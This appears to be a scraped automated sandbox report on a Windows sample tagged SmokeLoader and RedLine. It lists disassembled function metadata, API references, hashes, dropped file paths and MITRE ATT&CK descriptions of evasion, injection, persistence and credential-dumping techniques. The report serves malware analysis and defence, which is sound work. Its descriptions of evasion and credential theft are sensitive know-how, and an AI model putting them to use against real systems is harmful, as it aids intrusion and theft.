Opcode ID: 824ae0ef4bc253f760975746c6be83f05e6e4519ea7ba8a6329cfb40c6e36b63
Instruction ID: c11ffd2846b6ca50424ceae6a27ba6734b811758116d5890c572ff5ba2af9cb5
Opcode Fuzzy Hash: 824ae0ef4bc253f760975746c6be83f05e6e4519ea7ba8a6329cfb40c6e36b63
Instruction Fuzzy Hash: 1E51D176E05206DFEB6F9F58D840BAABBA6FF14314F144429F906972D1E7B1A840CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01105098 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 011050B4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 011050CD

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 969476300c94e9a4ee5ead054e12ca1b04feb2249535173c4a4f053ab560c63d
Instruction ID: e4d3953a406f9443a2f1cedafe829532f265cc5699628ce1b687cd993f93f3f5
Opcode Fuzzy Hash: 969476300c94e9a4ee5ead054e12ca1b04feb2249535173c4a4f053ab560c63d
Instruction Fuzzy Hash: F4012B32E093175EE66F67B87C8992F3A4AEB312787200329F524552E1EFE24819E594

Uniqueness

Uniqueness Score: -1.00%

Function 00F3FB78 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 00F3FB8E
GetLastError.KERNEL32(?,?,?,?), ref: 00F3FB9B
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00F3FBC1
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00F3FBE7

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 341876029b386ccc451ed43c965939870e4ea6da41fab7ac156c9ccac0916fe4
Instruction ID: 0f446dddb07485d7dde10e9904b4001ac644797cac6e4e50e155f09642c2322d
Opcode Fuzzy Hash: 341876029b386ccc451ed43c965939870e4ea6da41fab7ac156c9ccac0916fe4
Instruction Fuzzy Hash: 0A1157B590021ABFCF209F54CD48D9EBF79EF45770F204114F824A21A0DB76CA44EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E840C0 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00F4F972
GetLastError.KERNEL32 ref: 00F4F97E
___initconout.LIBCMT ref: 00F4F98E

Part of subcall function 00F4F8F3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F4F993), ref: 00F4F906

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00F4F9A3

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: 7da170773d9cc1c484596bcff34218041f1158aaee338f180e18fce362707dd9
Instruction ID: 691cb6be9565679af3812bdd11e146f7e3e8172c7423184c38af94bd47a093da
Opcode Fuzzy Hash: 7da170773d9cc1c484596bcff34218041f1158aaee338f180e18fce362707dd9
Instruction Fuzzy Hash: 42F01C36500156FBCF322FD6DC04A993F26FB4A3B0B318121FE5D96121DB368820ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E8629E Relevance: 6.0, APIs: 4, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

SleepConditionVariableCS.KERNEL32 ref: 00EAB48A
LeaveCriticalSection.KERNEL32(0102C410), ref: 00EAB494
WaitForSingleObjectEx.KERNEL32(?,00000000), ref: 00EAB4A5
EnterCriticalSection.KERNEL32(0102C410), ref: 00EAB4AC

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: ca839905f3b5c57b6d9a6ec25b721e71ed68f1c4e72b0e455cf6d0c8961e58c3
Instruction ID: 8d65e2b1da44314033636d04508d96722119746189cb808712dcd48c37620cd4
Opcode Fuzzy Hash: ca839905f3b5c57b6d9a6ec25b721e71ed68f1c4e72b0e455cf6d0c8961e58c3
Instruction Fuzzy Hash: 86E09B31540134B7D6311F81ED05FAE3F39AF0D790B144010FAC97A116CB6A28509BD5

Uniqueness

Uniqueness Score: -1.00%

Function 01039760 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 01039BEC
___std_exception_destroy.LIBVCRUNTIME ref: 01039C02

Strings

@, xrefs: 010397FB

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: @
API String ID: 4194217158-2766056989
Opcode ID: 75c0d0c7175ebdc6ae2c95f1e2439259751104d1eb4a24945cb5a17ba9c4ae91
Instruction ID: ea1b4a2fee60b1bcc4e863fdf115f32be23422436002fc30470e8394623a3c86
Opcode Fuzzy Hash: 75c0d0c7175ebdc6ae2c95f1e2439259751104d1eb4a24945cb5a17ba9c4ae91
Instruction Fuzzy Hash: CED1DF71C00249DFEB05CFA8CD487EEFBB5AFA1304F248299D454AB2D1D7B45A84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011057AB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 011058B6

Strings

RCC, xrefs: 011057EA
MOC, xrefs: 011057E2

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 365f779873b402d93cb1ce1866a1cae6815e0c73f87cebce93a20995f4534ea6
Instruction ID: b1c900dcfa6e4bb52402628be56c1bf2d0798f6001866048c91cadc43fec4f97
Opcode Fuzzy Hash: 365f779873b402d93cb1ce1866a1cae6815e0c73f87cebce93a20995f4534ea6
Instruction Fuzzy Hash: 70414D71D00209EFDF1ADF99CD84AAE7BB6FF48304F14806AF90466291D3759A50DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E81726 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 00F30E8D
GetXStateFeaturesMask, xrefs: 00F30E3D

Memory Dump Source

Source File: 00000006.00000002.1666877068.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000006.00000002.1666860531.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000E8E000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000EA9000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666877068.0000000000F53000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.0000000000F5A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1666992163.000000000101A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667072300.0000000001025000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667086465.0000000001026000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667102167.0000000001027000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667119885.0000000001029000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667139482.000000000102A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667156174.000000000102C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667173577.000000000102F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.1667290641.00000000011B7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: ee68947c4e0ead565d8ac06ed67540496f4899a40767bedd38bc8c8fcbba3895
Instruction ID: 68608ed2e88e4d26be057ff2ab27554c158befa1db33f20fd82c158649cc18b6
Opcode Fuzzy Hash: ee68947c4e0ead565d8ac06ed67540496f4899a40767bedd38bc8c8fcbba3895
Instruction Fuzzy Hash: 2A01F73668022873DB223A96DC16E9E7F15DF40BB0F004823FD5D69150CEB24950FBD0

Uniqueness

Uniqueness Score: -1.00%

Function 010D4430 Relevance: 5.1, Strings: 4, Instructions: 146COMMON

Download Yara Rule

Strings

hER, xrefs: 010D447C
`ER, xrefs: 010D448C
XER, xrefs: 010D4484
\ER, xrefs: 010D4520

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: XER$\ER$`ER$hER
API String ID: 0-4254610640
Opcode ID: 25eb3a73fdf94e23ee59aa8f2495c1d0c2623920482fe496476fbb45615f61b6
Instruction ID: 163f23d5713ebb8481e0f6da250e8d26dd514f4302c64ee8071f677f943fb763
Opcode Fuzzy Hash: 25eb3a73fdf94e23ee59aa8f2495c1d0c2623920482fe496476fbb45615f61b6
Instruction Fuzzy Hash: 97516BB1E002199FCF04DFA8D9849EEBBF5FF94304F1541AAD845E7311DA30AA05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010DD330 Relevance: 5.0, Strings: 4, Instructions: 14COMMON

Download Yara Rule

Strings

<RR, xrefs: 010DD345
HRR, xrefs: 010DD34B
PRR, xrefs: 010DD33F
0RR, xrefs: 010DD351

Memory Dump Source

Source File: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Offset: 01031000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e80000_4ZZ099qJ.jbxd

Yara matches

Similarity

API ID:
String ID: 0RR$<RR$HRR$PRR
API String ID: 0-730616535
Opcode ID: b2c57a76eef1f0ae40aeab3c90e2d24a5b11cd98efa6c60650b130955239600a
Instruction ID: aba8a97638cb2226e70527a7ef5c5418c201d9cfe56a13c8daa282389cb83b1c
Opcode Fuzzy Hash: b2c57a76eef1f0ae40aeab3c90e2d24a5b11cd98efa6c60650b130955239600a
Instruction Fuzzy Hash: 94C04C2D654A60932B9DAB7C212813C0CC0FAC33107CE92E5634982BD4E82DC9009200

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jtfCFDmLdX.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

C:\Users\user\AppData\Local\932079.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\8F82.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\932079.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\D9EC.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\IdentityReference.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\39D.exe.log

Windows Analysis Report
jtfCFDmLdX.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
